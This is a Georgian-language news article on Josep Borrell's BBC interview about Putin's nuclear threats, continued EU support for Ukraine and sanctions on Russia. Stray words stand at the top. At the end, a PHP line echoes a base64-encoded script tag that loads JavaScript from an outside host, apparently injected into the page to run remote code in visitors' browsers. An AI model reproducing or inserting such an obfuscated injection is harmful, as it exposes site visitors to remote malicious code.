celsiusi
ავერსი შნაიდერი
ევროკავშირმა ბირთვული იარაღის შესაძლო გამოყენებასთან დაკავშირებით ვლადიმერ პუტინის მუქარა სერიოზულად უნდა მიიღოს, – ამის შესახებ საგარეო და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესმა კომისარმა, ჯოზეფ ბორელმა „ბიბისისთან“ ინტერვიუში განაცხადა.
 
ბორელის თქმით, ომმა „საშიშ მომენტს“ მიაღწია.
 
ომის დაწყებიდან შვიდი თვის შემდეგ, ანალიტიკოსები თანხმდებიან, რომ პუტინის ძალები უკან იხევენ, მაგრამ ბორელის თქმით, აუცილებელია დიპლომატიური გადაწყვეტილების მოძებნა, ისეთის, რომელიც უკრაინის სუვერენეტეტსა და ტერიტორიულ მთლიანობას შეინარჩუნებს.
 
„რა თქმა უნდა, ეს არის სახიფათო მომენტი, რადგან რუსები კუთხეში მოიმწყვდიეს და პუტინის რეაქცია – ბირთვული იარაღის გამოყენების მუქარის შესახებ, არის ძალიან ცუდი.
 
სხვა შემთხვევაში, ჩვენ შეგვიძლია ომის დასრულება, მაგრამ არ გვექნება მშვიდობა და გვექნება სხვა ომი“ – განაცხადა ბორელმა.
 
ევროკავშირის უმაღლესმა კომისარმა „ბიბისისთან“ ინტერვიუში აღნიშნა, რომ ორგანიზაციამ უნდა გააგრძელოს უკრაინის მხარდაჭერა და რუსეთზე სანქციების გზით ზეწოლა. ბორელმა მოუწოდა პრეზიდენტ პუტინს, საკუთარი როლი შეასრულოს კონფლიქტის დიპლომატიის გზით მოგვარების კუთხით, „რადგან ტანგოს ცეკვისთვის ორია საჭირო“.
 
მისივე თქმით, ყველა ვინც წავიდა მოსკოვში პუტინთან სასაუბროდ, მისგან ერთი და იმავე პასუხით დაბრუნდა: „მე (პუტინს) მაქვს სამხედრო მიზნები და ამ სამხედრო მიზნებს თუ არ მივაღწევ, გავაგრძელებ ბრძოლას.“
 
„რა თქმა უნდა, ეს შემაშფოთებელი მიმართულებაა, მაგრამ ჩვენ უნდა გავაგრძელოთ უკრაინის მხარდაჭერა“, – განაცხადა ბორელმა.
444
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");